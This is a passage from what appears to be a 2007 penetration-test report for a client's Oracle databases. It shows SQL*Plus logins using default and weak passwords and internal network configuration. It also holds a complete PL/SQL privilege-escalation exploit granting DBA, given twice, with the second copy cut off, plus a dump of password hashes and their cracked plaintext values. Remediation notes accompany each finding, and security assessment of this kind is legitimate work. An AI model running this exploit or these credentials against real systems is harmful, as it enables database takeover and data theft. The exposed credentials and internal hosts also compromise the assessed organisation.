You may need to run PUPBLD.SQL as SYSTEM
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 353 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Connected to:
Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
With the Partitioning option
JServer Release 9.2.0.1.0 - Production
SQL> show user;
USER is "ATSADMIN"
SQL> select * from user_sys_privs;
no rows selected
It was possible to access the database with a custom username and password (market/market):
oracle@&ORCL:/export/home/oracle/util>sqlplus
SQL*Plus: Release 9.2.0.1.0 - Production on Sun Sep 2 19:29:22 2007
Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.
Enter user-name: market
Enter password:
Error accessing PRODUCT_USER_PROFILE
Warning: Product user profile information not loaded!
You may need to run PUPBLD.SQL as SYSTEM
Connected to:
Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
With the Partitioning option
JServer Release 9.2.0.1.0 - Production
SQL> show user;
USER is "MARKET"
SQL> select * from user_sys_privs;
USERNAME PRIVILEGE ADM
------------------------------ ---------------------------------------- ---
MARKET UNLIMITED TABLESPACE NO
It was possible to access the database with a custom username and password
(atscmf/newv3rs10n):
oracle@&ORCL:/export/home/oracle/util>sqlplus atscmf/newv3rs10n
SQL*Plus: Release 9.2.0.1.0 - Production on Sun Sep 2 19:29:58 2007
Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.
Error accessing PRODUCT_USER_PROFILE
Warning: Product user profile information not loaded!
You may need to run PUPBLD.SQL as SYSTEM
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 354 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
It was possible to access the database with a custom username and password (atsswap/F1nal1y):
oracle@&ORCL:/export/home/oracle/util>sqlplus atsswap/F1nal1y
SQL*Plus: Release 9.2.0.1.0 - Production on Sun Sep 2 19:33:19 2007
Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.
Error accessing PRODUCT_USER_PROFILE
Warning: Product user profile information not loaded!
You may need to run PUPBLD.SQL as SYSTEM
Connected to:
Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
With the Partitioning option
JServer Release 9.2.0.1.0 - Production
SQL> sho user;
USER is "ATSSWAP"
SQL> select * from user_sys_privs;
USERNAME PRIVILEGE ADM
------------------------------ ---------------------------------------- ---
ATSSWAP UNLIMITED TABLESPACE NO
It was possible to access the database with a custom username and password (mtsnet/mtsnet):
oracle@&ORCL:/export/home/oracle/util>sqlplus mtsnet/mtsnet
SQL*Plus: Release 9.2.0.1.0 - Production on Sun Sep 2 19:34:11 2007
Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.
Error accessing PRODUCT_USER_PROFILE
Warning: Product user profile information not loaded!
You may need to run PUPBLD.SQL as SYSTEM
Connected to:
Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
With the Partitioning option
JServer Release 9.2.0.1.0 - Production
SQL> show user;
USER is "MTSNET"
SQL> select * from user_sys_privs;
USERNAME PRIVILEGE ADM
------------------------------ ---------------------------------------- ---
MTSNET UNLIMITED TABLESPACE NO
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 355 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
It was possible to access the database with a custom username and passwrd
(atscmf/newv3rs10n):
Connected to:
Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
With the Partitioning option
JServer Release 9.2.0.1.0 - Production
SQL> show user;
USER is "ATSCMF"
SQL> select * from user_sys_privs;
USERNAME PRIVILEGE ADM
------------------------------ ---------------------------------------- ---
ATSCMF UNLIMITED TABLESPACE NO
User roles can be determined:
oracle@&ORCL:/export/home/oracle/util>sqlplus atsadmin/atsadmin; sqlplus
market/market; sqlplus atscmf/newv3rs10n; sqlplus atsswap/F1nal1y; sqlplus
mtsnet/mtsnet;
SQL*Plus: Release 9.2.0.1.0 - Production on Sun Sep 2 23:43:33 2007
Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.
Error accessing PRODUCT_USER_PROFILE
Warning: Product user profile information not loaded!
You may need to run PUPBLD.SQL as SYSTEM
Connected to:
Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
With the Partitioning option
JServer Release 9.2.0.1.0 - Production
SQL> select *
from user_role_privs
; 2 3
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
ATSADMIN CONNECT NO YES NO
ATSADMIN RESOURCE NO YES NO
SQL>
SQL> exit
Disconnected from Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit
Production
With the Partitioning option
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 356 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
JServer Release 9.2.0.1.0 - Production
SQL*Plus: Release 9.2.0.1.0 - Production on Sun Sep 2 23:56:03 2007
Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.
Error accessing PRODUCT_USER_PROFILE
Warning: Product user profile information not loaded!
You may need to run PUPBLD.SQL as SYSTEM
Connected to:
Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
With the Partitioning option
JServer Release 9.2.0.1.0 - Production
SQL> select *
from user_role_privs
; 2 3
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
MARKET CONNECT NO YES NO
MARKET RESOURCE NO YES NO
SQL> exit
Disconnected from Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit
Production
With the Partitioning option
JServer Release 9.2.0.1.0 - Production
SQL*Plus: Release 9.2.0.1.0 - Production on Sun Sep 2 23:56:25 2007
Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.
Error accessing PRODUCT_USER_PROFILE
Warning: Product user profile information not loaded!
You may need to run PUPBLD.SQL as SYSTEM
Connected to:
Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
With the Partitioning option
JServer Release 9.2.0.1.0 - Production
SQL> select *
from user_role_privs
; 2 3
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
ATSCMF CONNECT NO YES NO
ATSCMF RESOURCE NO YES NO
SQL> exit
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 357 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Disconnected from Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit
Production
With the Partitioning option
JServer Release 9.2.0.1.0 - Production
SQL*Plus: Release 9.2.0.1.0 - Production on Sun Sep 2 23:56:34 2007
Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.
Error accessing PRODUCT_USER_PROFILE
Warning: Product user profile information not loaded!
You may need to run PUPBLD.SQL as SYSTEM
Connected to:
Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
With the Partitioning option
JServer Release 9.2.0.1.0 - Production
SQL> select *
from user_role_privs
; 2 3
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
ATSSWAP CONNECT NO YES NO
ATSSWAP RESOURCE NO YES NO
SQL> exit
Disconnected from Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit
Production
With the Partitioning option
JServer Release 9.2.0.1.0 - Production
SQL*Plus: Release 9.2.0.1.0 - Production on Sun Sep 2 23:57:11 2007
Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.
Error accessing PRODUCT_USER_PROFILE
Warning: Product user profile information not loaded!
You may need to run PUPBLD.SQL as SYSTEM
Connected to:
Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
With the Partitioning option
JServer Release 9.2.0.1.0 - Production
SQL> select *
from user_role_privs
; 2 3
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 358 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
MTSNET CONNECT NO YES NO
MTSNET RESOURCE NO YES NO
SQL> exit
Disconnected from Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit
Production
With the Partitioning option
JServer Release 9.2.0.1.0 - Production
SQL*Plus: Release 9.2.0.1.0 - Production on Sun Sep 2 23:57:15 2007
Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.
Error accessing PRODUCT_USER_PROFILE
Warning: Product user profile information not loaded!
You may need to run PUPBLD.SQL as SYSTEM
Connected to:
Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
With the Partitioning option
JServer Release 9.2.0.1.0 - Production
SQL> select *
from user_role_privs
; 2 3
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
DBSNMP CONNECT NO YES NO
It was possible to fetch the exact version of the running database:
SQL> select * from v$version where banner like 'Oracle%';
BANNER
----------------------------------------------------------------
Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
SQL>
It was possible to access a local file containing TSN Listeners of other machines:
# TNSNAMES.ORA Network Configuration File: /opt/oracle/product/9.2.0/network/adm
in/tnsnames.ora
# Generated by Oracle configuration tools.
INET =
(DESCRIPTION =
(ADDRESS_LIST =
(ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.254.22)(PORT = 1521))
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 359 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
)
(CONNECT_DATA =
(SERVICE_NAME = ORCL)
)
)
ATSMIL =
(DESCRIPTION =
(ADDRESS_LIST =
(ADDRESS = (PROTOCOL = TCP)(HOST = 100.100.200.5)(PORT = 1521))
)
(CONNECT_DATA =
(SERVICE_NAME = ORCL)
)
)
ATST =
(DESCRIPTION =
(ADDRESS_LIST =
(ADDRESS = (PROTOCOL = TCP)(HOST = exit)(PORT = 1521))
)
(CONNECT_DATA =
(SERVICE_NAME = ORCL)
)
)
ATSTEST =
(DESCRIPTION =
(ADDRESS_LIST =
(ADDRESS = (PROTOCOL = TCP)(HOST = milatstest)(PORT = 1521))
)
(CONNECT_DATA =
(SERVICE_NAME = ORCL)
)
)
MRC =
(DESCRIPTION =
(ADDRESS_LIST =
(ADDRESS = (PROTOCOL = TCP)(HOST = milbvalpha)(PORT = 1521))
)
(CONNECT_DATA =
(SERVICE_NAME = ORCL)
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 360 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
)
)
HIST =
(DESCRIPTION =
(ADDRESS_LIST =
(ADDRESS = (PROTOCOL = TCP)(HOST = mtsdwh)(PORT = 1521))
)
(CONNECT_DATA =
(SERVICE_NAME = DWHA)
)
ANAPROD =
(DESCRIPTION =
(ADDRESS_LIST =
(ADDRESS = (PROTOCOL = TCP)(HOST = 193.178.206.133)(PORT = 5555))
(ADDRESS = (PROTOCOL = TCP)(HOST = 193.178.206.134)(PORT = 5555))
)
(CONNECT_DATA =
(SERVICE_NAME = ANAMTSPR)
)
)
EXTPROC_CONNECTION_DATA =
(DESCRIPTION =
(ADDRESS_LIST =
(ADDRESS = (PROTOCOL = IPC)(KEY = EXTPROC))
)
(CONNECT_DATA =
(SID = PLSExtProc)
(PRESENTATION = RO)
)
)
ANAPROD =
(DESCRIPTION =
(ADDRESS_LIST =
(ADDRESS = (PROTOCOL = TCP)(HOST = 193.178.206.133)(PORT = 5555))
(ADDRESS = (PROTOCOL = TCP)(HOST = 193.178.206.134)(PORT = 5555))
)
(CONNECT_DATA =
(SERVICE_NAME = ANAMTSPR)
)
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 361 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
)
EXTPROC_CONNECTION_DATA =
(DESCRIPTION =
(ADDRESS_LIST =
(ADDRESS = (PROTOCOL = IPC)(KEY = EXTPROC))
)
(CONNECT_DATA =
(SID = PLSExtProc)
(PRESENTATION = RO)
)
)
A local privilege escalation to DBA is possible using the following exploit from the DBSNMP
account:
select * from user_role_privs;
select * from user_sys_privs;
EXEC CTXSYS.DRILOAD.VALIDATE_STMT('GRANT DBA TO DBSNMP');
CREATE OR REPLACE PACKAGE BUNKERPKG AUTHID CURRENT_USER IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv) RETURN NUMBER;
END;
/
CREATE OR REPLACE PACKAGE BODY BUNKERPKG IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv) RETURN NUMBER IS
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO DBSNMP';
COMMIT;
RETURN(1);
END;
END;
/
DECLARE
INDEX_NAME VARCHAR2(200);
INDEX_SCHEMA VARCHAR2(200);
TYPE_NAME VARCHAR2(200);
TYPE_SCHEMA VARCHAR2(200);
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 362 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
VERSION VARCHAR2(200);
NEWBLOCK PLS_INTEGER;
GMFLAGS NUMBER;
v_Return VARCHAR2(200);
BEGIN
INDEX_NAME := 'A1';
INDEX_SCHEMA := 'DBSNMP';
TYPE_NAME := 'BUNKERPKG';
TYPE_SCHEMA := 'DBSNMP';
VERSION := '';
GMFLAGS := 1;
v_Return := SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA(
INDEX_NAME => INDEX_NAME, INDEX_SCHEMA => INDEX_SCHEMA, TYPE_NAME
=> TYPE_NAME,
TYPE_SCHEMA => TYPE_SCHEMA, VERSION => VERSION, NEWBLOCK =>
NEWBLOCK, GMFLAGS => GMFLAGS
);
END;
/
select * from user_role_privs;
select * from user_sys_privs;
SELECT NAME, PASSWORD FROM SYS.USER$ where rownum between 0 and 20;
oracle@&ORCL:/export/home/oracle/.vnc>sqlplus DBSNMP/DBSNMP
SQL*Plus: Release 9.2.0.1.0 - Production on Mon Sep 3 03:25:34 2007
Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.
Error accessing PRODUCT_USER_PROFILE
Warning: Product user profile information not loaded!
You may need to run PUPBLD.SQL as SYSTEM
Connected to:
Oracle9i Enterprise Edition Release 9.2.0.1.0 - 64bit Production
With the Partitioning option
JServer Release 9.2.0.1.0 - Production
select * from user_role_privs;
select * from user_sys_privs;
SQL> SELECT NAME, PASSWORD FROM SYS.USER$;
NAME PASSWORD
------------------------------ ------------------------------
SYS B3FDF88DC629C79B
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 363 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
PUBLIC
CONNECT
RESOURCE
DBA
SYSTEM AD47C8AA621F0072
SELECT_CATALOG_ROLE
EXECUTE_CATALOG_ROLE
DELETE_CATALOG_ROLE
EXP_FULL_DATABASE
IMP_FULL_DATABASE
NAME PASSWORD
------------------------------ ------------------------------
OUTLN 4A3BA55E08595C81
RECOVERY_CATALOG_OWNER
GATHER_SYSTEM_STATISTICS
LOGSTDBY_ADMINISTRATOR
AQ_ADMINISTRATOR_ROLE
AQ_USER_ROLE
GLOBAL_AQ_USER_ROLE GLOBAL
OEM_MONITOR
DBSNMP E066D214D5421CCC
HS_ADMIN_ROLE
_NEXT_USER
NAME PASSWORD
------------------------------ ------------------------------
ATSADMIN AB0C333373FA275B
MTSNET 9C1D08286EECF58A
MARKET 7ADF0631FA3113BA
RTROME 725C315D7CE7E0B2
PERFSTAT AC98877DE1297365
ATSSDP 67A6FCE962536631
ATSCMF FF4FE502854CCFD4
ATSSWAP 3C927CD87FABBD19
ADMIN 95F3C64472751462
APPS D728438E8A5925E0
32 rows selected.
SQL> SPOOL OFF;exit
It was possible to crack most of the authentication hashes:
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 364 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Hashed Clear text
SYS:B3FDF88DC629C79B
SYSTEM:AD47C8AA621F0072
OUTLN:4A3BA55E08595C81
DBSNMP:E066D214D5421CCC
ATSADMIN:AB0C333373FA275B
MTSNET:9C1D08286EECF58A
MARKET:7ADF0631FA3113BA
RTROME:725C315D7CE7E0B2
PERFSTAT:AC98877DE1297365
ATSSDP:67A6FCE962536631
ATSCMF:FF4FE502854CCFD4
ATSSWAP:3C927CD87FABBD19
ADMIN:95F3C64472751462
APPS:D728438E8A5925E0
OUTLN:OUTLN
ATSSDP:ATSSDP
RTROME:RTROME
MARKET:MARKET
ADMIN:ADMIN
MTSNET:MTSNET
ATSADMIN:ATSADMIN
PERFSTAT:PERFSTAT
APPS:APPS
DBSNMP:DBSNMP
7.1.2 100.100.245.12 [Compromised]
Rating: compromised
Vulnerabilities found: V2, V5, V7, V10
Risk state: high
Skill level required to exploit the vulnerability: Medium
Solution: Change all default passwords; update Oracle to the last version available or at least install all
required patches; enable security in TNS listener; encrypt sensitive data files
Discovery method Network scan
Availability Startup on boot
Class Application/Service
Vendor/OS Oracle Version 10.2.0.1.0
Compromised Compromised Directly Info TSN Listener with no pass.
Auth Not needed
The database server is accessible by any host in the network. No firewall ACL is present.
It's possible to fetch the complete Oracle status by querying the TNS Listener.
Passwordless TNS Listener allows arbitrary file creation with the privileges of the user running the
Oracle database by altering the log path. Local access to the user rurring Oracle can be gained by
creating a .rhost file.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 365 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
7.1.3 100.100.245.15 [Compromised]
Rating: compromised
Vulnerabilities found: V2, V5, V7, V10
Risk state: high
Skill level required to exploit the vulnerability: Medium
Solution: Change all default passwords; update Oracle to the last version available or at least install all
required patches; enable security in TNS listener; encrypt sensitive data files
Discovery method Network scan
Availability Startup on boot
Class Application/Service
Vendor/OS Oracle Version 8.1.7.1.0
Compromised Compromised Directly Info Priv. Escalation to DBA
Auth Not detected
The database server is accessible by any host in the network. No firewall ACL is present.
It's possible to fetch the complete Oracle status by querying the TNS Listener.
Passwordless TNS Listener allows arbitrary file creation with the privileges of the user running the
Oracle database by altering the log path. Local access to the user rurring Oracle can be gained by
creating a .rhost file:
LSNRCTL> set current_listener 192.168.254.15
Current Listener is 192.168.254.15
LSNRCTL> version
Connecting to
(DESCRIPTION=(CONNECT_DATA=(SID=*)(SERVICE_NAME=192.168.254.15))(ADDRESS=(PROTOC
OL=TCP)(HOST=192.168.254.15)(PORT=1521)))
TNSLSNR for Solaris: Version 8.1.7.1.0 - Production
TNS for Solaris: Version 8.1.7.1.0 - Production
Unix Domain Socket IPC NT Protocol Adaptor for Solaris: Version
8.1.7.1.0 - Production
Oracle Bequeath NT Protocol Adapter for Solaris: Version 8.1.7.1.0 -
Production
TCP/IP NT Protocol Adapter for Solaris: Version 8.1.7.1.0 - Production,,
The command completed successfully
LSNRCTL>
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 366 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
LSNRCTL> services
Connecting to
(DESCRIPTION=(CONNECT_DATA=(SID=*)(SERVICE_NAME=192.168.254.15))(ADDRESS=(PROTOC
OL=TCP)(HOST=192.168.254.15)(PORT=1521)))
Services Summary...
Service "PLSExtProc" has 1 instance(s).
Instance "PLSExtProc", status READY, has 1 handler(s) for this service...
Handler(s):
"DEDICATED" established:1 refused:0 state:ready
LOCAL SERVER
Service "PROD" has 1 instance(s).
Instance "PROD", status READY, has 1 handler(s) for this service...
Handler(s):
"DEDICATED" established:11447 refused:0 state:ready
LOCAL SERVER
Service "milfinprod" has 1 instance(s).
Instance "PROD", status READY, has 1 handler(s) for this service...
Handler(s):
"DEDICATED" established:1737 refused:0 state:ready
LOCAL SERVER
The command completed successfully
LSNRCTL> status
Connecting to
(DESCRIPTION=(CONNECT_DATA=(SID=*)(SERVICE_NAME=192.168.254.15))(ADDRESS=(PROTOC
OL=TCP)(HOST=192.168.254.15)(PORT=1521)))
STATUS of the LISTENER
------------------------
Alias PROD
Version TNSLSNR for Solaris: Version 8.1.7.1.0 - Production
Start Date 18-JUL-2007 09:32:38
Uptime 46 days 10 hr. 37 min. 33 sec
Trace Level off
Security OFF
SNMP OFF
Listener Parameter File /d01/proddb/8.1.7/network/admin/listener.ora
Listener Log File /d01/proddb/8.1.7/network/admin/prod.log
Listening Endpoints Summary...
(DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROCPROD)))
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=milfinprod)(PORT=1521)))
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 367 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Services Summary...
Service "PLSExtProc" has 1 instance(s).
Instance "PLSExtProc", status READY, has 1 handler(s) for this service...
Service "PROD" has 1 instance(s).
Instance "PROD", status READY, has 1 handler(s) for this service...
Service "milfinprod" has 1 instance(s).
Instance "PROD", status READY, has 1 handler(s) for this service...
The command completed successfully
7.1.4 100.100.245.16 [Compromised]
Rating: compromised
Vulnerabilities found: V2, V5, V7, V10
Risk state: high
Skill level required to exploit the vulnerability: Medium
Solution: Change all default passwords; update Oracle to the last version available or at least install all
required patches; enable security in TNS listener; encrypt sensitive data files
Discovery method Network scan
Availability Startup on boot
Class Application/Service
Vendor/OS Oracle Version 9.2.0.1.0
Compromised Compromised Directly Info Priv. Escalation to DBA
Auth Not detected
The database server is accessible by any host in the network. No firewall ACL is present.
It's possible to fetch the complete Oracle status by queryng the TNS Listener.
Passwordless TNS Listener allow arbitrary file creation with the privileges of the user running the
Oracle database by altering the log path. Local access to the user rurring Oracle can be gained by
creating a .rhost file:
LSNRCTL> set current_listener 192.168.254.16
Current Listener is 192.168.254.16
LSNRCTL> version
Connecting to
(DESCRIPTION=(CONNECT_DATA=(SID=*)(SERVICE_NAME=192.168.254.16))(ADDRESS=(PROTOC
OL=TCP)(HOST=192.168.254.16)(PORT=1521)))
TNSLSNR for Solaris: Version 9.2.0.1.0 - Production
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 368 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
TNS for Solaris: Version 9.2.0.1.0 - Production
Unix Domain Socket IPC NT Protocol Adaptor for Solaris: Version
9.2.0.1.0 - Production
Oracle Bequeath NT Protocol Adapter for Solaris: Version 9.2.0.1.0 -
Production
TCP/IP NT Protocol Adapter for Solaris: Version 9.2.0.1.0 - Production,,
The command completed successfully
LSNRCTL> services
Connecting to
(DESCRIPTION=(CONNECT_DATA=(SID=*)(SERVICE_NAME=192.168.254.16))(ADDRESS=(PROTOC
OL=TCP)(HOST=192.168.254.16)(PORT=1521)))
Services Summary...
Service "PLSExtProc" has 1 instance(s).
Instance "PLSExtProc", status UNKNOWN, has 1 handler(s) for this service...
Handler(s):
"DEDICATED" established:1 refused:0
LOCAL SERVER
Service "PROD" has 1 instance(s).
Instance "PROD", status READY, has 1 handler(s) for this service...
Handler(s):
"DEDICATED" established:23442 refused:0 state:ready
LOCAL SERVER
Service "RMAN" has 1 instance(s).
Instance "RMAN", status READY, has 1 handler(s) for this service...
Handler(s):
"DEDICATED" established:1255 refused:0 state:ready
LOCAL SERVER
The command completed successfully
LSNRCTL> status
Connecting to
(DESCRIPTION=(CONNECT_DATA=(SID=*)(SERVICE_NAME=192.168.254.16))(ADDRESS=(PROTOC
OL=TCP)(HOST=192.168.254.16)(PORT=1521)))
STATUS of the LISTENER
------------------------
Alias LISTENER
Version TNSLSNR for Solaris: Version 9.2.0.1.0 - Production
Start Date 28-OCT-2006 18:06:55
Uptime 309 days 3 hr. 4 min. 48 sec
Trace Level off
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 369 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Security OFF
SNMP OFF
Listener Parameter File /opt/oracle/product/9.2/network/admin/listener.ora
Listener Log File /opt/oracle/product/9.2/network/log/listener.log
Listening Endpoints Summary...
(DESCRIPTION=(ADDRESS=(PROTOCOL=ipc)(KEY=EXTPROC)))
(DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=milfintest)(PORT=1521)))
Services Summary...
Service "PLSExtProc" has 1 instance(s).
Instance "PLSExtProc", status UNKNOWN, has 1 handler(s) for this service...
Service "PROD" has 1 instance(s).
Instance "PROD", status READY, has 1 handler(s) for this service...
Service "RMAN" has 1 instance(s).
Instance "RMAN", status READY, has 1 handler(s) for this service...
The command completed successfully
It was possible to access the database with a default username and password (ICX/ICX):
bash-2.03$ sqlplus icx/icx
SQL*Plus: Release 8.0.6.0.0 - Production on Mon Sep 3 02:05:58 2007
(c) Copyright 1999 Oracle Corporation. All rights reserved.
Connected to:
Oracle8i Enterprise Edition Release 8.1.7.1.0 - Production
With the Partitioning option
JServer Release 8.1.7.1.0 - Production
SQL> select *
from user_role_privs
; 2 3
USERNAME GRANTED_ROLE ADM DEF OS_
------------------------------ ------------------------------ --- --- ---
ICX CTXAPP NO YES NO
It was possible to access the database with a default username and password
(APPLSYSPUB/PUB):
bash-2.03$ sqlplus APPLSYSPUB/PUB
SQL*Plus: Release 8.1.7.0.0 - Production on Mon Sep 3 02:31:27 2007
(c) Copyright 2000 Oracle Corporation. All rights reserved.
Connected to:
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 370 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Oracle8i Enterprise Edition Release 8.1.7.1.0 - Production
With the Partitioning option
JServer Release 8.1.7.1.0 - Production
SQL> select * from user_sys_privs;
USERNAME PRIVILEGE ADM
------------------------------ ---------------------------------------- ---
APPLSYSPUB ALTER SESSION NO
APPLSYSPUB CREATE SESSION NO
APPLSYSPUB CREATE SYNONYM NO
APPLSYSPUB UNLIMITED TABLESPACE NO
A local privilege escalation to DBA is possible using the following exploit from the APPLSYSPUB
account:
CREATE OR REPLACE PACKAGE BUNKERPKG AUTHID CURRENT_USER IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv) RETURN NUMBER;
END;
/
CREATE OR REPLACE PACKAGE BODY BUNKERPKG IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv) RETURN NUMBER IS
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO APPLSYSPUB';
COMMIT;
RETURN(1);
END;
END;
/
DECLARE
INDEX_NAME VARCHAR2(200);
INDEX_SCHEMA VARCHAR2(200);
TYPE_NAME VARCHAR2(200);
TYPE_SCHEMA VARCHAR2(200);
VERSION VARCHAR2(200);
NEWBLOCK PLS_INTEGER;
GMFLAGS NUMBER;
v_Return VARCHAR2(200);
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 371 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
BEGIN
INDEX_NAME := 'A1';
INDEX_SCHEMA := 'APPLSYSPUB';
TYPE_NAME := 'BUNKERPKG';
